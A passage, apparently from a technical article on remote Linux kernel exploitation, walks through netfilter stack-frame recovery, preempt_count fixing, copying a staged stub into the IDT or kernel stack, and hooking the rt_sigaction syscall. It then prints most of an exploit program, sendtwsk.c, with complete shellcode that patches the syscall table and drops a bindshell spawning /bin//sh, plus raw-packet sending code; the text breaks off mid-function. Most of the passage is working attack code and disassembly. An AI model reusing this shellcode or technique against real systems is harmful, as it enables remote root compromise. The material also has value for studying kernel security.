+"\x89\xc6"              // mov    %eax,%esi
+"\x31\xc0"              // xor    %eax,%eax
+"\xb0\x04"              // mov    $0x4,%al
+"\xf7\xe1"              // mul    %ecx
+"\x29\xc4"              // sub    %eax,%esp
+
+ - set the return value 
+
+"\x31\xc0"              // xor    %eax,%eax
+
+ - call the nf_hook_slow() function epilog
+ 
+"\xff\xe6"              // jmp    *%esi
+
+
+It is now time to pass to the 'second step', that is restore any pending
+lock or other synchronization object to a consistent state for the
+nf_hook_slow() function. 
+
+
+---[ 3.2.3 - Resource Restoring 
+
+
+At that phase we care of restoring those resources that are necessary for
+the 'hooked return function' (and its callers) to cleanly get out from the
+softirq/interrupt state. 
+
+Let's take another (closer) look at nf_hook_slow() : 
+
+< linux-2.6.15/net/netfilter/core.c >
+
+int nf_hook_slow(int pf, unsigned int hook, struct sk_buff **pskb,
+                 struct net_device *indev,
+                 struct net_device *outdev,
+                 int (*okfn)(struct sk_buff *),
+                 int hook_thresh)
+{
+        struct list_head *elem;
+        unsigned int verdict;
+        int ret = 0;
+
+        /* We may already have this, but read-locks nest anyway */
+        rcu_read_lock();		[1]
+
+[...]
+ 
+unlock:
+        rcu_read_unlock();		[2]
+        return ret;			[3]
+}
+
+< / >
+
+At [1] 'rcu_read_lock()' is invoked/acquired, but [2] 'rcu_read_unlock()'
+is never performed, since at the 'Stack Frame Flow Recovery' step we
+unrolled the stack and jumped back at [3]. 
+
+'rcu_read_unlock()' is just an alias of preempt_enable(), which, in the 
+end, results in a one-decrement of the preempt_count value inside the
+thread_info struct :
+
+< linux-2.6.15/include/linux/rcupdate.h >
+
+#define rcu_read_lock()         preempt_disable()
+
+[...]
+
+#define rcu_read_unlock()       preempt_enable()
+
+< / >
+
+< linux-2.6.15/include/linux/preempt.h >
+
+# define add_preempt_count(val) do { preempt_count() += (val); } while (0)
+# define sub_preempt_count(val) do { preempt_count() -= (val); } while (0)
+
+[...]
+
+#define inc_preempt_count() add_preempt_count(1)
+#define dec_preempt_count() sub_preempt_count(1)
+
+#define preempt_count() (current_thread_info()->preempt_count)
+
+#ifdef CONFIG_PREEMPT
+
+asmlinkage void preempt_schedule(void);
+
+#define preempt_disable() \
+do { \
+        inc_preempt_count(); \
+        barrier(); \
+} while (0)
+
+#define preempt_enable_no_resched() \
+do { \
+        barrier(); \
+        dec_preempt_count(); \
+} while (0)
+
+#define preempt_check_resched() \
+do { \
+        if (unlikely(test_thread_flag(TIF_NEED_RESCHED))) \
+                preempt_schedule(); \
+} while (0)
+
+#define preempt_enable() \
+do { \
+        preempt_enable_no_resched(); \
+        barrier(); \
+        preempt_check_resched(); \
+} while (0)
+
+#else
+
+#define preempt_disable()               do { } while (0)
+#define preempt_enable_no_resched()     do { } while (0)
+#define preempt_enable()                do { } while (0)
+#define preempt_check_resched()         do { } while (0)
+
+#endif
+     
+< / >   
+
+As you can see, if CONFIG_PREEMPT is not set, all those operations are 
+just no-ops. 'preempt_disable()' is nestable, so it can be called multiple
+times (preemption will be disabled untill we call 'preempt_enable()' the 
+same number of times). That means that, given a PREEMPT kernel, we should
+find a value equal or greater to '1' inside preempt_count at 'exploit
+time'. We can't just ignore that value or otherwise we'll BUG() later on
+inside scheduler code (check preempt_schedule_irq() in kernel/sched.c). 
+
+What we have to do, on a PREEMPT kernel, is thus locate 'preempt_count'
+and decrement it, just like 'rcu_read_unlock()' would do. 
+For the x86 architecture , 'preempt_count' is stored inside the 'struct 
+thread_info' : 
+
+< linux-2.6.15/include/asm-i386/thread_info.h >
+
+struct thread_info {
+        struct task_struct      *task;          /* main task structure */
+        struct exec_domain      *exec_domain;   /* execution domain */
+        unsigned long           flags;          /* low level flags */
+        unsigned long           status;         /* thread-synchronous
+flags */
+        __u32                   cpu;            /* current CPU */
+        int                     preempt_count;  /* 0 => preemptable, <0 =>
+BUG */
+
+
+        mm_segment_t            addr_limit;     /* thread address space:
+                                                   0-0xBFFFFFFF for
+user-thead
+                                                   0-0xFFFFFFFF for
+kernel-thread
+                                                */
+ 
+[...]
+
+< / >
+
+Let's see how we get to it : 
+
+ - locate the thread_struct 
+
+"\x89\xe0"                 // mov %esp,%eax
+"\x25\x00\xe0\xff\xff"     // and $0xffffe000,%eax
+
+ - scan the thread_struct to locate the addr_limit value. This value is a
+   good fingerprint, since it is 0xc0000000 for an userland process and  
+   0xffffffff for a kernel thread (or the idle task). [note that this kind 
+   of scan can be used to figure out in which kind of process we are, 
+   something that could be very important in some scenario] 
+
+/* scan: */
+"\x83\xc0\x04"             // add $0x4,%eax
+"\x8b\x18"                 // mov (%eax),%ebx
+"\x83\xfb\xff"             // cmp $0xffffffff,%ebx
+"\x74\x0a"                 // je 804851e <end>
+"\x81\xfb\x00\x00\x00\xc0" // cmp $0xc0000000,%ebx
+"\x74\x02"                 // je 804851e <end>
+"\xeb\xec"                 // jmp 804850a <scan>
+
+ - decrement the 'preempt_count' value [which is just the member above the
+   addr_limit one] 
+
+/* end: */
+"\xff\x48\xfc"             // decl 0xfffffffc(%eax)
+ 
+
+To improve further the shellcode it would be a good idea to perform a test
+over the preempt_count value, so that we would not end up into lowering it
+below zero. 
+
+
+---[ 3.2.4 - Copying the Stub 
+
+ 
+We have just finished presenting a generic method to restore the stack
+after a 'general mess-up' of the netfilter core call-frames. 
+What we have to do now is to find some place to store our shellcode, since
+we can't (as we said before) directly execute from inside interrupt
+context. [remember the note, this step and the following one are executed
+before getting out from the softirq context]. 
+
+Since we don't know almost anything about the remote kernel image memory
+mapping we need to find a 'safe place' to store the shellcode, that is, we
+need to locate some memory region that we can for sure reference and that
+won't create problems (read : Oops) if overwritten. 
+
+There are two places where we can copy our 'stage-2' shellcode :
+
+  - IDT (Interrupt Descriptor Table) : we can easily get the IDT logical
+    address at runtime (as we saw previously in the NULL dereference
+    example) and Linux uses only the 0x80 software interrupt vector : 
+
+    +-----------------+
+    | exeption        |
+    |    entries      |
+    |-----------------|
+    |  hw interrupt   |
+    |      entries    |
+    |-----------------| entry #32 ==+
+    |                 |             |
+    |  soft interrupt |             |
+    |      entries    |             | usable gap
+    |                 |             |
+    |                 |             |
+    |                 |           ==+
+    |  int 0x80       | entry #128
+    |                 |
+    +-----------------+ <- offset limit
+ 
+    Between entry #32 and entry #128 we have all unused descriptor
+    entries, each 8 bytes long. Linux nowadays doesn't map that memory
+    area as read-only [as it should be], so we can write on it [*]. 	
+    We have thus : (128 - 32) * 8 = 98 * 8 = 784 bytes, which is enough 
+    for our 'stage-2 shellcode'. 
+
+    [*] starting with the Linux kernel 2.6.20 it is possible to map some
+        areas as read-only [the idt is just one of those]. Since we don't
+        'start' writing into the IDT area and executing from there, it is
+        possible to bypass that protection simply modifying directly
+        kernel page tables protection in 'previous stages' of the
+        shellcode.
+
+  - the current kernel stack : we need to make a little assumption here,
+    that is being inside a process that would last for some time (untill
+    we'll be able to redirect kernel code over our shellcode, as we will
+    see in the next section). 
+    Usually the stack doesn't grow up to 4kb, so we have an almost free 
+    4kb page for us (given that the remote system is using an 8kb stack
+    space). To be safe, we can leave some pad space before the shellcode. 
+    We need to take care of the 'struct thread_struct' saved at the
+    'bottom' of the kernel stack (and that logically we don't want to
+    overwrite ;) ) :
+
+    +-----------------+
+    | thread_struct   |
+    |---------------- |  ==+
+    |                 |    | usable gap
+    |                 |    |
+    |-----------------|  ==+
+    |                 |
+    |       ^         |
+    |       |         |  [ normally the stack doesn't ]
+    |       |         |  [ grow over 4kb              ]
+    |                 |
+    |  ring0 stack    |
+    +-----------------+
+    
+    Alltogether we have : (8192 - 4096) - sizeof(descriptor) - pad ~= 2048
+    bytes, which is even more than before. 
+    With a more complex shellcode we can traverse the process table and
+    look forward for a 'safe process' (init, some kernel thread, some main
+    server process). 
+
+Let's give a look to the shellcode performing that task : 
+
+ - get the stack address where we are [the uber-famous call/pop trick]
+
+"\xe8\x00\x00\x00\x00"         //  call   51 <search+0x29>
+"\x59"                         //  pop    %ecx
+ 
+ - scan the stack untill we find the 'start marker' of our stage-2 stub. 
+   We put a \xaa byte at the start of it, and it's the only one present in
+   the shellcode. The addl $10 is there just to start scanning after the
+   'cmp $0xaa, %al', which would otherwise give a false positive for \xaa.
+
+"\x83\xc1\x10"                 //  addl $10, %ecx
+"\x41"                         //  inc    %ecx
+"\x8a\x01"                     //  mov    (%ecx),%al
+"\x3c\xaa"                     //  cmp    $0xaa,%al
+"\x75\xf9"                     //  jne    52 <search+0x2a>
+
+ - we have found the start of the shellcode, let's copy it in the 'safe
+   place' untill the 'end marker' (\xbb). The 'safe place' here is saved
+   inside the %esi register. We haven't shown how we calculated it because
+   it directly derives from the shellcode used in the next section (it's
+   simply somwhere in the stack space). This code could be optimized by
+   saving the 'stage-2' stub size in %ecx and using rep/repnz in
+   conjuction with mov instructions. 
+
+"\x41"                         //  inc    %ecx
+"\x8a\x01"                     //  mov    (%ecx),%al
+"\x88\x06"                     //  mov    %al,(%esi)
+"\x46"                         //  inc    %esi
+"\x41"                         //  inc    %ecx
+"\x80\x39\xbb"                 //  cmpb   $0xbb,(%ecx)
+"\x75\xf5"                     //  jne    5a <search+0x32>
+ 
+   [during the develop phase of the exploit we have changed a couple of
+    times the 'stage-2' part, that's why we left that kind of copy
+    operation, even if it's less elegant :) ]
+
+
+---[ 3.2.5 - Executing Code in Userspace Context [Gimme Life!] 
+
+
+Okay, we have a 'safe place', all we need now is a 'safe moment', that is
+a process context to execute in. The first 'easy' solution that could come
+to your mind could be overwriting the #128 software interrupt [int $0x80],
+so that it points to our code. The first process issuing a system call
+would thus become our 'victim process-context'.
+This approach has, thou, two major drawbacks : 
+   
+  - we have no way to intercept processes using sysenter to access kernel
+    space (what if all were using it ? It would be a pretty odd way to
+    fail...) 
+
+  - we can't control which process is 'hooked' and that might be
+    'disastrous' if the process is the init one or a critical one,
+    since we'll borrow its userspace to execute our shellcode (a bindshell
+    or a connect-back is not a short-lasting process).  
+
+We have to go a little more deeper inside the kernel to achieve a good
+hooking. Our choice was to use the syscall table and to redirect a system
+call which has an high degree of possibility to be called and that we're
+almost sure that isn't used inside init or any critical process. 
+Our choice, after a couple of tests, was to hook the rt_sigaction syscall,
+but it's not the only one. It just worked pretty well for us. 
+
+To locate correctly in memory the syscall table we use the stub of code
+that sd and devik presented in their phrack paper [23] about /dev/kmem 
+patching: 
+
+ - we get the current stack address, calculate the start of the
+   thread_struct and we add 0x1000 (pad gap) [simbolic value far enough
+   from both the end of the thread_struct and the top of stack]. Here is
+   where we set that %esi value that we have presented as 'magically
+   already there' in the shellcode-part discussed before.
+
+"\x89\xe6"                     //  mov    %esp,%esi
+"\x81\xe6\x00\xe0\xff\xff"     //  and    $0xffffe000,%esi
+"\x81\xc6\x00\x10\x00\x00"     //  add    $0x1000,%esi
+
+ - sd & devik sligthly re-adapted code.
+ 
+
+"\x0f\x01\x0e"                 //  sidtl  (%esi)
+"\x8b\x7e\x02"                 //  mov    0x2(%esi),%edi
+"\x81\xc7\x00\x04\x00\x00"     //  add    $0x400,%edi
+"\x66\x8b\x5f\x06"             //  mov    0x6(%edi),%bx
+"\xc1\xe3\x10"                 //  shl    $0x10,%ebx
+"\x66\x8b\x1f"                 //  mov    (%edi),%bx
+"\x43"                         //  inc    %ebx
+"\x8a\x03"                     //  mov    (%ebx),%al
+"\x3c\xff"                     //  cmp    $0xff,%al
+"\x75\xf9"                     //  jne    28 <search>
+"\x8a\x43\x01"                 //  mov    0x1(%ebx),%al
+"\x3c\x14"                     //  cmp    $0x14,%al
+"\x75\xf2"                     //  jne    28 <search>
+"\x8a\x43\x02"                 //  mov    0x2(%ebx),%al
+"\x3c\x85"                     //  cmp    $0x85,%al
+"\x75\xeb"                     //  jne    28 <search>
+"\x8b\x5b\x03"                 //  mov    0x3(%ebx),%ebx 
+
+
+- logically we need to save the original address of the syscall somewhere,
+  and we decided to put it just before the 'stage-2' shellcode : 
+
+ "\x81\xc3\xb8\x02\x00\x00"     //  add 0x2b8, %ebx       
+ "\x89\x5e\xf8"                 //  movl %ebx, 0xfffffff8(%esi) 
+ "\x8b\x13"                     //  mov    (%ebx),%edx
+ "\x89\x56\xfc"                 //  mov    %edx,0xfffffffc(%esi)
+ "\x89\x33"                     //  mov    %esi,(%ebx)
+
+As you see, we save the address of the rt_sigaction entry [offset 0x2b8]
+inside syscall table (we will need it at restore time, so that we won't
+have to calculate it again) and the original address of the function
+itself (the above counterpart in the restoring phase). We make point the
+rt_sigaction entry to our shellcode : %esi. Now it should be even clearer
+why, in the previous section, we had ''magically'' the destination address
+to copy our stub into in %esi.    
+
+The first process issuing a rt_sigaction call will just give life to the
+stage-2 shellcode, which is the final step before getting the connect-back
+or the bindshell executed. [or whatever shellcode you like more ;) ]
+We're still in kerneland, while our final goal is to execute an userland
+shellcode, so we still have to perform a bounch of operations. 
+
+There are basically two methods (not the only two, but probably the easier
+and most effective ones) to achieve our goal : 
+
+  - find saved EIP, temporary disable WP control register flag, copy
+    the userland shellcode overthere and re-enable WP flag [it could be 
+    potentially dangerous on SMP]. If the syscall is called through
+    sysenter, the saved EIP points into vsyscall table, so we must 'scan'
+    the stack 'untill ret' (not much different from what we do in the
+    stack frame recovery step, just easier here), to get the real
+    userspace saved EIP after vsyscall 'return' : 
+
+    0xffffe410 <__kernel_vsyscall+16>:      pop    %ebp
+    0xffffe411 <__kernel_vsyscall+17>:      pop    %edx
+    0xffffe412 <__kernel_vsyscall+18>:      pop    %ecx
+    0xffffe413 <__kernel_vsyscall+19>:      ret
+
+    As you can see, the first executed userspace address (writable) is at
+    saved *(ESP + 12).
+
+  - find saved ESP or use syscall saved parameters pointing to an userspace
+    buffer, copy the shellcode in that memory location and overwrite the
+    saved EIP with saved ESP (or userland buffer address)
+
+The second method is preferable (easier and safer), but if we're dealing
+with an architecture supporting the NX-bit or with a software patch that
+emulates the execute bit (to mark the stack and eventually the heap as
+non-executable), we have to fallback to the first, more intrusive, method,
+or our userland process will just segfault while attempting to execute the
+shellcode. Since we do have full control of the process-related kernel 
+data we can also copy the shellcode in a given place and modify page
+protection. [not different from the idea proposed above for IDT read-only 
+in the 'Copy the Stub' section]
+
+Once again, let's go on with the dirty details : 
+
+ - the usual call/pop trick to get the address we're executing from 
+
+"\xe8\x00\x00\x00\x00"         //  call   8 <func+0x8>
+"\x59"                         //  pop    %ecx
+ 
+ - patch back the syscall table with the original rt_sigaction address
+   [if those 0xff8 and 0xffc have no meaning for you, just remember that we 
+    added 0x1000 to the thread_struct stack address to calculate our 'safe
+    place' and that we stored just before both the syscall table entry 
+    address of rt_sigaction and the function address itself]
+
+"\x81\xe1\x00\xe0\xff\xff"     //  and    $0xffffe000,%ecx
+"\x8b\x99\xf8\x0f\x00\x00"     //  mov    0xff8(%ecx),%ebx
+"\x8b\x81\xfc\x0f\x00\x00"     //  mov    0xffc(%ecx),%eax
+"\x89\x03"                     //  mov    %eax,(%ebx)
+
+ - locate Userland ESP and overwrite Userland EIP with it [method 2] 
+
+"\x8b\x74\x24\x38"             //  mov    0x38(%esp),%esi
+"\x89\x74\x24\x2c"             //  mov    %esi,0x2c(%esp)
+"\x31\xc0"                     //  xor    %eax,%eax
+
+ - once again we use a marker (\x22) to locate the shellcode we want to
+   copy on process stack. Let's call it 'stage-3' shellcode. 
+   We use just another simple trick here to locate the marker and avoid a
+   false positive : instead of jumping after (as we did for the \xaa one)
+   we set the '(marker value) - 1' in %al and then increment it. 
+   The copy is exactly the same (with the same 'note') we saw before 
+
+"\xb0\x21"                     //  mov    $0x21,%al
+"\x40"                         //  inc    %eax
+"\x41"                         //  inc    %ecx
+"\x38\x01"                     //  cmp    %al,(%ecx)
+"\x75\xfb"                     //  jne    2a <func+0x2a>
+"\x41"                         //  inc    %ecx
+"\x8a\x19"                     //  mov    (%ecx),%bl
+"\x88\x1e"                     //  mov    %bl,(%esi)
+"\x41"                         //  inc    %ecx
+"\x46"                         //  inc    %esi
+"\x38\x01"                     //  cmp    %al,(%ecx)
+"\x75\xf6"                     //  jne    30 <func+0x30>
+
+ - return from the syscall and let the process cleanly exit to userspace.
+   Control will be transfered to our modified EIP and shellcode will be
+   executed
+
+"\xc3"                         //  ret
+
+
+We have used a 'fixed' value to locate userland ESP/EIP, which worked well
+for the 'standard' kernels/apps we tested it on (getting to the syscall via 
+int $0x80). With a little more effort (worth the time) you can avoid those
+offset assumptions by implementing a code similar to the one for the Stack
+Frame Recovery tecnique. 
+Just take a look to how current userland EIP,ESP,CS and SS are saved
+before jumping at kernel level :
+
+ring0 stack:
++--------+
+| SS     |  
+| ESP    |  <--- saved ESP
+| EFLAG  |
+| CS     |  
+| EIP    |  <--- saved EIP
+|......  |
++--------+
+
+All 'unpatched' kernels will have the same value for SS and CS and we can
+use it as a fingerprint to locate ESP and EIP (that we can test to be
+below PAGE_OFFSET [*]) 
+
+[*] As we already said, on latest kernels there could be a different
+    uspace/kspace split address than 0xc0000000 [2G/2G or 1G/3G 
+    configurations]
+
+We won't show here the 'stage-3' shellcode since it is a standard
+'userland' bindshell one. Just use the one you need depending on the
+environment. 
+
+
+---[ 3.2.6 - The Code : sendtwsk.c
+
+
+< stuff/expl/sendtwsk.c > 
+
+#include <sys/socket.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+
+/* from vuln module */
+#define MAX_TWSKCHUNK 30
+/* end */
+
+#define NOP 0x90
+
+#define OVERFLOW_NEED   20
+
+#define JMP           "\xe9\x07\xfe\xff\xff"
+#define SIZE_JMP      (sizeof(JMP) -1)
+
+#define TWSK_PACKET_LEN (((MAX_TWSKCHUNK * sizeof(struct twsk_chunk)) +
+OVERFLOW_NEED) + SIZE_JMP \
+                         + sizeof(struct twsk) + sizeof(struct iphdr))
+
+#define TWSK_PROTO 37
+
+
+#define DEFAULT_VSYSCALL_RET 0xffffe413
+#define DEFAULT_VSYSCALL_JMP 0xc01403c0
+
+/*
+ *  find the correct value..
+alpha:/usr/src/linux/debug/article/remote/figaro/ip_figaro# ./roll
+val: 2147483680, 80000020 result: 512
+val: 2147483681, 80000021 result: 528
+*/
+
+#define NEGATIVE_CHUNK_NUM 0x80000020
+
+char shellcode[]=
+/* hook sys_rtsigaction() and copy the 2level shellcode (72) */
+
+ "\x90\x90"                     //  nop; nop; [alignment]
+ "\x89\xe6"                     //  mov    %esp,%esi
+ "\x81\xe6\x00\xe0\xff\xff"     //  and    $0xffffe000,%esi
+ "\x81\xc6\x00\x10\x00\x00"     //  add    $0x1000,%esi
+ "\x0f\x01\x0e"                 //  sidtl  (%esi)
+ "\x8b\x7e\x02"                 //  mov    0x2(%esi),%edi
+ "\x81\xc7\x00\x04\x00\x00"     //  add    $0x400,%edi
+ "\x66\x8b\x5f\x06"             //  mov    0x6(%edi),%bx
+ "\xc1\xe3\x10"                 //  shl    $0x10,%ebx
+ "\x66\x8b\x1f"                 //  mov    (%edi),%bx
+ "\x43"                         //  inc    %ebx
+ "\x8a\x03"                     //  mov    (%ebx),%al
+ "\x3c\xff"                     //  cmp    $0xff,%al
+ "\x75\xf9"                     //  jne    28 <search>
+ "\x8a\x43\x01"                 //  mov    0x1(%ebx),%al
+ "\x3c\x14"                     //  cmp    $0x14,%al
+ "\x75\xf2"                     //  jne    28 <search>
+ "\x8a\x43\x02"                 //  mov    0x2(%ebx),%al
+ "\x3c\x85"                     //  cmp    $0x85,%al
+ "\x75\xeb"                     //  jne    28 <search>
+ "\x8b\x5b\x03"                 //  mov    0x3(%ebx),%ebx [get
+sys_call_table]
+
+ "\x81\xc3\xb8\x02\x00\x00"     //  add 0x2b8, %ebx       [get
+sys_rt_sigaction offset]
+ "\x89\x5e\xf8"                 //  movl %ebx, 0xfffffff8(%esi) [save
+sys_rt_sigaction]
+
+ "\x8b\x13"                     //  mov    (%ebx),%edx
+ "\x89\x56\xfc"                 //  mov    %edx,0xfffffffc(%esi)
+ "\x89\x33"                     //  mov    %esi,(%ebx)    [make
+sys_rt_sigaction point to our shellcode]
+
+ "\xe8\x00\x00\x00\x00"         //  call   51 <search+0x29>
+ "\x59"                         //  pop    %ecx
+ "\x83\xc1\x10"                 //  addl $10, %ecx
+ "\x41"                         //  inc    %ecx
+ "\x8a\x01"                     //  mov    (%ecx),%al
+ "\x3c\xaa"                     //  cmp    $0xaa,%al
+ "\x75\xf9"                     //  jne    52 <search+0x2a>
+ "\x41"                         //  inc    %ecx
+ "\x8a\x01"                     //  mov    (%ecx),%al
+ "\x88\x06"                     //  mov    %al,(%esi)
+ "\x46"                         //  inc    %esi
+ "\x41"                         //  inc    %ecx
+ "\x80\x39\xbb"                 //  cmpb   $0xbb,(%ecx)
+ "\x75\xf5"                     //  jne    5a <search+0x32>
+
+/* find and decrement preempt counter (32) */
+
+ "\x89\xe0"                     //  mov %esp,%eax
+ "\x25\x00\xe0\xff\xff"         //  and $0xffffe000,%eax
+ "\x83\xc0\x04"                 //  add $0x4,%eax
+ "\x8b\x18"                     //  mov (%eax),%ebx
+ "\x83\xfb\xff"                 //  cmp $0xffffffff,%ebx
+ "\x74\x0a"                     //  je 804851e <end>
+ "\x81\xfb\x00\x00\x00\xc0"     //  cmp $0xc0000000,%ebx
+ "\x74\x02"                     //  je 804851e <end>
+ "\xeb\xec"                     //  jmp 804850a <scan>
+ "\xff\x48\xfc"                 //  decl 0xfffffffc(%eax)
+
+/* stack frame recovery step */
+
+ "\x58"                         //  pop    %eax
+ "\x83\x3c\x24\x02"             //  cmpl   $0x2,(%esp)
+ "\x75\xf9"                     //  jne    8048330 <do_unroll>
+ "\x83\x7c\x24\x04\x01"         //  cmpl   $0x1,0x4(%esp)
+ "\x75\xf2"                     //  jne    8048330 <do_unroll>
+ "\x83\x7c\x24\x10\x00"         //  cmpl   $0x0,0x10(%esp)
+ "\x75\xeb"                     //  jne    8048330 <do_unroll>
+ "\x8d\x64\x24\xfc"             //  lea    0xfffffffc(%esp),%esp
+
+ "\x8b\x04\x24"                 //  mov    (%esp),%eax
+ "\x89\xc3"                     //  mov    %eax,%ebx
+ "\x03\x43\xfc"                 //  add    0xfffffffc(%ebx),%eax
+ "\x40"                         //  inc    %eax
+ "\x8a\x18"                     //  mov    (%eax),%bl
+ "\x80\xfb\xc3"                 //  cmp    $0xc3,%bl
+ "\x75\xf8"                     //  jne    8048351 <do_unroll+0x21>
+ "\x80\x78\xff\x88"             //  cmpb   $0x88,0xffffffff(%eax)
+ "\x74\xf2"                     //  je     8048351 <do_unroll+0x21>
+ "\x80\x78\xff\x89"             //  cmpb   $0x89,0xffffffff(%eax)
+ "\x74\xec"                     //  je     8048351 <do_unroll+0x21>
+ "\x31\xc9"                     //  xor    %ecx,%ecx
+ "\x48"                         //  dec    %eax
+ "\x8a\x18"                     //  mov    (%eax),%bl
+ "\x80\xe3\xf0"                 //  and    $0xf0,%bl
+ "\x80\xfb\x50"                 //  cmp    $0x50,%bl
+ "\x75\x03"                     //  jne    8048375 <do_unroll+0x45>
+ "\x41"                         //  inc    %ecx
+ "\xeb\xf2"                     //  jmp    8048367 <do_unroll+0x37>
+ "\x40"                         //  inc    %eax
+ "\x89\xc6"                     //  mov    %eax,%esi
+ "\x31\xc0"                     //  xor    %eax,%eax
+ "\xb0\x04"                     //  mov    $0x4,%al
+ "\xf7\xe1"                     //  mul    %ecx
+ "\x29\xc4"                     //  sub    %eax,%esp
+ "\x31\xc0"                     //  xor    %eax,%eax
+ "\xff\xe6"                     //  jmp    *%esi
+
+/* end of stack frame recovery */
+
+/* stage-2 shellcode */
+
+ "\xaa"                         //  border stage-2 start
+
+ "\xe8\x00\x00\x00\x00"         //  call   8 <func+0x8>
+ "\x59"                         //  pop    %ecx
+ "\x81\xe1\x00\xe0\xff\xff"     //  and    $0xffffe000,%ecx
+ "\x8b\x99\xf8\x0f\x00\x00"     //  mov    0xff8(%ecx),%ebx
+ "\x8b\x81\xfc\x0f\x00\x00"     //  mov    0xffc(%ecx),%eax
+ "\x89\x03"                     //  mov    %eax,(%ebx)
+ "\x8b\x74\x24\x38"             //  mov    0x38(%esp),%esi
+ "\x89\x74\x24\x2c"             //  mov    %esi,0x2c(%esp)
+ "\x31\xc0"                     //  xor    %eax,%eax
+ "\xb0\x21"                     //  mov    $0x21,%al
+ "\x40"                         //  inc    %eax
+ "\x41"                         //  inc    %ecx
+ "\x38\x01"                     //  cmp    %al,(%ecx)
+ "\x75\xfb"                     //  jne    2a <func+0x2a>
+ "\x41"                         //  inc    %ecx
+ "\x8a\x19"                     //  mov    (%ecx),%bl
+ "\x88\x1e"                     //  mov    %bl,(%esi)
+ "\x41"                         //  inc    %ecx
+ "\x46"                         //  inc    %esi
+ "\x38\x01"                     //  cmp    %al,(%ecx)
+ "\x75\xf6"                     //  jne    30 <func+0x30>
+ "\xc3"                         //  ret
+
+ "\x22"                         //  border stage-3 start
+
+ "\x31\xdb"                     //  xor    ebx, ebx
+ "\xf7\xe3"                     //  mul    ebx
+ "\xb0\x66"                     //  mov     al, 102
+ "\x53"                         //  push    ebx
+ "\x43"                         //  inc     ebx
+ "\x53"                         //  push    ebx
+ "\x43"                         //  inc     ebx
+ "\x53"                         //  push    ebx
+ "\x89\xe1"                     //  mov     ecx, esp
+ "\x4b"                         //  dec     ebx
+ "\xcd\x80"                     //  int     80h
+ "\x89\xc7"                     //  mov     edi, eax
+ "\x52"                         //  push    edx
+ "\x66\x68\x4e\x20"             //  push    word 8270
+ "\x43"                         //  inc     ebx
+ "\x66\x53"                     //  push    bx
+ "\x89\xe1"                     //  mov     ecx, esp
+ "\xb0\xef"                     //  mov    al, 239
+ "\xf6\xd0"                     //  not    al
+ "\x50"                         //  push    eax
+ "\x51"                         //  push    ecx
+ "\x57"                         //  push    edi
+ "\x89\xe1"                     //  mov     ecx, esp
+ "\xb0\x66"                     //  mov     al, 102
+ "\xcd\x80"                     //  int     80h
+ "\xb0\x66"                     //  mov     al, 102
+ "\x43"                         //  inc    ebx
+ "\x43"                         //  inc    ebx
+ "\xcd\x80"                     //  int     80h
+ "\x50"                         //  push    eax
+ "\x50"                         //  push    eax
+ "\x57"                         //  push    edi
+ "\x89\xe1"                     //  mov    ecx, esp
+ "\x43"                         //  inc    ebx
+ "\xb0\x66"                     //  mov    al, 102
+ "\xcd\x80"                     //  int    80h
+ "\x89\xd9"                     //  mov    ecx, ebx
+ "\x89\xc3"                     //  mov     ebx, eax
+ "\xb0\x3f"                     //  mov     al, 63
+ "\x49"                         //  dec     ecx
+ "\xcd\x80"                     //  int     80h
+ "\x41"                         //  inc     ecx
+ "\xe2\xf8"                     //  loop    lp
+ "\x51"                         //  push    ecx
+ "\x68\x6e\x2f\x73\x68"         //  push    dword 68732f6eh
+ "\x68\x2f\x2f\x62\x69"         //  push    dword 69622f2fh
+ "\x89\xe3"                     //  mov     ebx, esp
+ "\x51"                         //  push    ecx
+ "\x53"                         //  push    ebx
+ "\x89\xe1"                     //  mov    ecx, esp
+ "\xb0\xf4"                     //  mov    al, 244
+ "\xf6\xd0"                     //  not    al
+ "\xcd\x80"                     //  int     80h
+
+
+ "\x22"                         //  border stage-3 end
+
+ "\xbb";                        //  border stage-2 end
+
+/* end of shellcode */
+
+
+struct twsk_chunk
+{
+  int type;
+  char buff[12];
+};
+
+struct twsk
+{
+  int chunk_num;
+  struct twsk_chunk chunk[0];
+};
+
+
+void fatal_perror(const char *issue)
+{
+  perror("issue");
+  exit(1);
+}
+
+void fatal(const char *issue)
+{
+  perror("issue");
+  exit(1);
+}
+
+/* packet IP cheksum */
+unsigned short csum(unsigned short *buf, int nwords)
+{
+        unsigned long sum;
+        for(sum=0; nwords>0; nwords--)
+                sum += *buf++;
+        sum = (sum >> 16) + (sum &0xffff);
+        sum += (sum >> 16);
+        return ~sum;
+}
+
+
+void prepare_packet(char *buffer)
+{
+  unsigned char *ptr = (unsigned char *)buffer;;
+  unsigned int i;
+  unsigned int left;
+
+  left = TWSK_PACKET_LEN - sizeof(struct twsk) - sizeof(struct iphdr);
+  left -= SIZE_JMP;
+  left -= sizeof(shellcode)-1;
+
+  ptr += (sizeof(struct twsk)+sizeof(struct iphdr));
+
+  memset(ptr, 0x00, TWSK_PACKET_LEN);
+  memcpy(ptr, shellcode, sizeof(shellcode)-1); /* shellcode must be 4
+bytes aligned */
+
+  ptr += sizeof(shellcode)-1;
+
+  for(i=1; i < left/4; i++, ptr+=4)
+        *((unsigned int *)ptr) = DEFAULT_VSYSCALL_RET;
+
+  *((unsigned int *)ptr) = DEFAULT_VSYSCALL_JMP;
+  ptr+=4;
+
+  printf("buffer=%p, ptr=%p\n", buffer, ptr);
+  strcpy(ptr, JMP); /* jmp -500 */
+
+}
+
+
+int main(int argc, char *argv[])
+{
+        int sock;
+        struct sockaddr_in sin;
+        int one = 1;
+        const int *val = &one;
+
+        printf("shellcode size: %d\n", sizeof(shellcode)-1);
+
+        char *buffer = malloc(TWSK_PACKET_LEN);
+        if(!buffer)
+          fatal_perror("malloc");
+
+        prepare_packet(buffer);
+
+        struct iphdr *ip = (struct iphdr *) buffer;
+        struct twsk *twsk = (struct twsk *) (buffer + sizeof(struct
+iphdr));
+
+
+        if(argc < 2)
+        {
+          printf("Usage: ./sendtwsk ip");
+          exit(-1);
+        }
+
+
+        sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+        if (sock < 0)
+                fatal_perror("socket");
+
+        sin.sin_family = AF_INET;
+        sin.sin_port = htons(12345);
+        sin.sin_addr.s_addr = inet_addr(argv[1]);
+
+        /* ip packet */
+        ip->ihl = 5;
+        ip->version = 4;
+        ip->tos = 16;
+        ip->tot_len = TWSK_PACKET_LEN;
+        ip->id = htons(12345);
+        ip->ttl = 64;
+        ip->protocol = TWSK_PROTO;
+        ip->saddr = inet_addr("192.168.200.1");
